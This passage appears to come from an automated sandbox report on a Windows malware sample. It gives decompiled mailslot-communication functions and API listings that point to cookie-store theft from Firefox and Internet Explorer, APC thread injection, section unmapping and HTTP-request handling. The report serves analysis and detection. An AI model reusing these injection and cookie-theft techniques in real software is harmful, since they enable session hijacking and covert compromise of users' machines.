				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00000000,004017B9), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a541a8e2a336522e40d1be30749048c9d818c078e896fa602c1e5c17c186f932
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 7FE026810629C5C686BB500A28013B370CBBB7178BD9EE7700AA7390831FC23017564A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,?,00401062,00001000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 31
  • API ID: CreateEventGetLastErrorInterlockedDecrementOpenEventRtlExitUserThreadWaitForMultipleObjects
  • String ID:
  • API String ID: 420885392-0
  • Opcode ID: d33af0a5ccd8da24651d90541fd71a469b169468326c88d3ba2cd7f680d024ee
  • Instruction ID: 3c37b9249d7f180ebea28303f94ffcd4ec94dd99ac367b312ba22497ea172778
  • Opcode Fuzzy Hash: 38E02B3406094157223F70A4A211B7F4ED8F8872C268D638BFC283D2AD5A0791E62557
  • Instruction Fuzzy Hash: 3c37b9249d7f180ebea28303f94ffcd4ec94dd99ac367b312ba22497ea172778
APIs
  • OpenEventA.KERNEL32(00100000,00000000), ref: 001CD1A0
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001CD1BB
  • GetLastError.KERNEL32 ref: 001CD1C8
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001CD1EB
  • InterlockedDecrement.KERNEL32(001EAF4C), ref: 001CD217
    • Part of subcall function 001C13D6: SetEvent.KERNEL32(001EB094,001CD22D), ref: 001C13E0
    • Part of subcall function 001C13D6: CloseHandle.KERNEL32(001EB094), ref: 001C13F5
    • Part of subcall function 001C13D6: HeapDestroy.KERNELBASE(001EAF48), ref: 001C1405
  • RtlExitUserThread.NTDLL(00000000), ref: 001CD22E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 97
  • API ID: VirtualProtect$GetLastErrorRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2510858262-0
  • Opcode ID: 79e378e90741fe03a1868ff575f465e1dcc9b1d4b7d085768b56240e49bf8d92
  • Instruction ID: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
  • Opcode Fuzzy Hash: B2019C28149E95B7D43BB0841C52EC1C254BB53294C1D6372E892241C73F007709BB19
  • Instruction Fuzzy Hash: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
APIs
    • Part of subcall function 001D75AC: GetLastError.KERNEL32(00000024,?,001D7807,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?,?,00000000,001E5050,00000000), ref: 001D75D9
    • Part of subcall function 001D9FF2: lstrcmpi.KERNEL32(?,00000000), ref: 001DA027
  • VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,00000000,?,00000000,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?), ref: 001D7865
  • VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,001CB2EF), ref: 001D789F
  • RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D78E5
    • Part of subcall function 001D7646: lstrlen.KERNEL32(00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7678
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7692
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D76C5
  • RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D78C7
  • GetLastError.KERNEL32(?,001CB2EF), ref: 001D78FA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DA098: lstrcmpi.KERNEL32(?,00000000), ref: 001DA0DC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 38
  • API ID: RegCloseKeyRegQueryValueExwsprintf
  • String ID: Client
  • API String ID: 1809512201-3236430179
  • Opcode ID: 9042b19d19dd4b3d942996e0d3ea8ecf2d3d2b777e835d7718659b5b290a5e22
  • Instruction ID: bd4461f6c7afc55672d071394b4a111d53588a956b6005c1a3bb12a79494774e
  • Opcode Fuzzy Hash: 8CF04634A804C58A8693A885092A7FC4571B352AEECCCBF20F15852181FFC977D73B11
  • Instruction Fuzzy Hash: bd4461f6c7afc55672d071394b4a111d53588a956b6005c1a3bb12a79494774e
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(001CD70D,Client,00000000,?,001EA06C,?,00000001,001CD70D,00000000,00000000,00000001,?,?,00000000,001CD70D), ref: 001C3D98
    • Part of subcall function 001DE1CF: RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
    • Part of subcall function 001DE1CF: HeapFree.KERNEL32(00000000,?), ref: 001DE242
    • Part of subcall function 001DE1CF: GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
    • Part of subcall function 001DE1CF: RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
    • Part of subcall function 001DE1CF: GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
    • Part of subcall function 001DE1CF: HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
  • RegCloseKey.ADVAPI32(001CD70D,?,?,00000000,001CD70D,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C3DE1
  • wsprintfA.USER32 ref: 001C3E55
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: f05951512fc70493bcc218ada1478013eab1d332df878026975bea813deea018
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 32E026401A9D83C9C64754854852F22B264E764646DACF7626718BF232AF263236DF2A
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 01B33C8B: GetModuleFileNameW.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB1
    • Part of subcall function 01B33C8B: GetModuleFileNameA.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB9
    • Part of subcall function 01B33C8B: GetLastError.KERNEL32(?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000,?,?,?,01B317BE), ref: 01B33CF7
    • Part of subcall function 01B348FB: lstrcmp.KERNEL32(?,01B37494), ref: 01B349A8
    • Part of subcall function 01B348FB: lstrlen.KERNEL32(?,00000000,00000000,01B31852), ref: 01B349B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01B333BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,01B31BAF,01B38451), ref: 01B333CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 01B333E5
  • CloseHandle.KERNEL32(?), ref: 01B33400
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 64
  • API ID: HeapFreeRegCloseKeyRegQueryValueExRtlAllocateHeap
  • String ID:
  • API String ID: 1519508758-0
  • Opcode ID: 2c20f16d7cb35b0837f37e1f163c74e89bf46e78e287d7b3e7984998dc48fbe4
  • Instruction ID: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
  • Opcode Fuzzy Hash: BFE07DE10F45C256111F7D4A647FA76C310CC440D130C7313BD74596BD0E43301B8709
  • Instruction Fuzzy Hash: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
  • HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 129
  • API ID: RegCreateKeyRegOpenKeylstrlen
  • String ID:
  • API String ID: 3913359509-0
  • Opcode ID: 4a10325c95453f6cc476ef8e5a47647315785bf9e091164d0adb2aeafd4fec03
  • Instruction ID: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
  • Opcode Fuzzy Hash: 9CD0A934820C8ACBC02B88001C6AA2A80A0AB010C2C8C627278C23912B2F9072892EA5
  • Instruction Fuzzy Hash: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
APIs
  • RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
  • RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
  • lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

Similar Non-Executed Functions

Similarity
  • Total matches: 59
  • API ID: HeapFree$RtlAllocateHeaplstrcat$CreateDirectoryDeleteFilelstrlenmbstowcs
  • String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$\cookie.ff$\cookie.ie$\sols
  • API String ID: 2820067504-4232923486
  • Opcode ID: 3d14cf29faf766bfeb75039b264b2d7cbadb4797a584a71d88c970bf056bfa6f
  • Instruction ID: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
  • Opcode Fuzzy Hash: A2118CB00A05034BC02BA862E5AA37F4981BE835C4C4D1763FE05AB12E1F5731E67F0B
  • Instruction Fuzzy Hash: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
APIs
  • lstrlen.KERNEL32(%APPDATA%), ref: 001C1C68
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • RtlAllocateHeap.NTDLL(00000000,?,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C1CB3
  • mbstowcs.NTDLL ref: 001C1CC6
  • lstrcatW.KERNEL32(00000000,001EC804), ref: 001C1CD5
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C1CF9
  • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 001C1D0B
  • lstrcatW.KERNEL32(00000000,001E53C0), ref: 001C1D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1D51
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 001C1D77
    • Part of subcall function 001C1B85: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
    • Part of subcall function 001C1B85: lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
    • Part of subcall function 001C1B85: CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
    • Part of subcall function 001C1B85: HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
  • DeleteFileW.KERNEL32(?), ref: 001C1DC6
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DD4
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DF0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: FindFirstFile$FindCloseFindNextFileWaitForSingleObjectmemset
  • String ID:
  • API String ID: 1787114350-0
  • Opcode ID: f51bd5130761bfcbb2dde5f7148bce543a8c4d605f388eb2cd72b1422ad7a0c5
  • Instruction ID: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
  • Opcode Fuzzy Hash: 9831CD22216EB4C3D517A5A94459779F901DF007D6F09FB11E9A2E04CD9DC35AB0FF18
  • Instruction Fuzzy Hash: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D6FCE
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
  • WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
  • FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetComputerNameHeapFreeRtlAllocateHeap
  • String ID: Client
  • API String ID: 3015569430-3236430179
  • Opcode ID: fd148c837d0b481578b7d1bf63dc4b1a0bf1844f652122844ed59ba803be3f2c
  • Instruction ID: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
  • Opcode Fuzzy Hash: 4AF059624E5981B3403F44DA42A51BE4600F4C31E15CC272BFC14AE2ED8E0770A22F57
  • Instruction Fuzzy Hash: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
APIs
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
  • HeapFree.KERNEL32(00000000,?), ref: 001DE242
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
  • HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 37
  • API ID: GetLastError$FreeLibraryGetProcAddressLoadLibraryRegCloseKeyRegOpenKey
  • String ID:
  • API String ID: 3176510729-0
  • Opcode ID: c06c93110e7f7b91b8af1b73fb1b0b90ed9f89153cfcabb1f297ed8ce1865d6a
  • Instruction ID: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
  • Opcode Fuzzy Hash: CCF097B98604C18EC212342048796E6BB04AF400C5A9C1762FE94042826F1531673B96
  • Instruction Fuzzy Hash: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
APIs
  • RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
  • RegCloseKey.ADVAPI32(?), ref: 001DF4EE
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
  • GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
  • GetLastError.KERNEL32 ref: 001DF4BC
  • FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
  • GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: CreateToolhelp32SnapshotGetModuleHandleGetProcAddressOpenThreadQueueUserAPCThread32FirstThread32Next
  • String ID:
  • API String ID: 1672352458-0
  • Opcode ID: 1aeb80c38cfc5c0a8cfd58ac1562df29def6d9c7c8df75773877e7a5eae794f0
  • Instruction ID: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
  • Opcode Fuzzy Hash: D4E02064520567CFC21760B0915371EF90479A5CD5E1C777FF4A428E0B2E0731A7A375
  • Instruction Fuzzy Hash: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
APIs
  • CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
  • GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
  • GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
  • Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
  • OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
  • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
  • Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: DeleteFileFindFirstFileFindNextFileGetLastErrorRemoveDirectory
  • String ID:
  • API String ID: 1089496181-0
  • Opcode ID: 404a45bcf307c79ebd751717ed0c922086e74df7a977f6731b91689120b89dc8
  • Instruction ID: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
  • Opcode Fuzzy Hash: 2401CBA3511DC96BEF83A1E06920BCBD444EF01270E8EE379A934204C54F00798B3B8F
  • Instruction Fuzzy Hash: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • FindFirstFileW.KERNEL32(?,00000000), ref: 001D7327
  • RemoveDirectoryW.KERNEL32(?), ref: 001D73A1
  • DeleteFileW.KERNEL32(?), ref: 001D73AC
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D73BF
  • GetLastError.KERNEL32 ref: 001D73DA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 120
  • API ID: GetLastError$CloseHandleCreateNamedPipeCreateThread
  • String ID:
  • API String ID: 1313248766-0
  • Opcode ID: 30add2293a1c4e7698607cd224a2cd89a7530f0af40c3b4cc732cba0ae1be137
  • Instruction ID: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
  • Opcode Fuzzy Hash: C6D0A7B057080ACAC517A130847936FABD5EFC51C1E8D0776F780B106F6B9731EA989E
  • Instruction Fuzzy Hash: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
APIs
  • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,001EB0D8,079007F4), ref: 001CBED5
  • CreateThread.KERNEL32(00000000,00000000,001CBB92,00000000,00000000,?), ref: 001CBEEF
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF00
  • CloseHandle.KERNEL32(00000000), ref: 001CBF09
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF11
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 86
  • API ID: HeapFreeNtUnmapViewOfSectionRtlNtStatusToDosError
  • String ID:
  • API String ID: 3330954857-0
  • Opcode ID: 02a61448e217c9ef6f534c07a9fd427649efd77a8a877fb27eb9f5184da74e11
  • Instruction ID: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
  • Opcode Fuzzy Hash: 1CC02BB0481582C3B53F0CA2008E126ED45BAD32E0A0E1025E0083404CF5A3C7FCBF49
  • Instruction Fuzzy Hash: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
APIs
  • NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
  • HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 52
  • API ID: HeapFreeRtlAllocateHeaplstrlen$StrChrmemcpy$lstrcpynmemmove
  • String ID: GET $GET $OPTI$OPTI$POST$PUT
  • API String ID: 2276190360-647159250
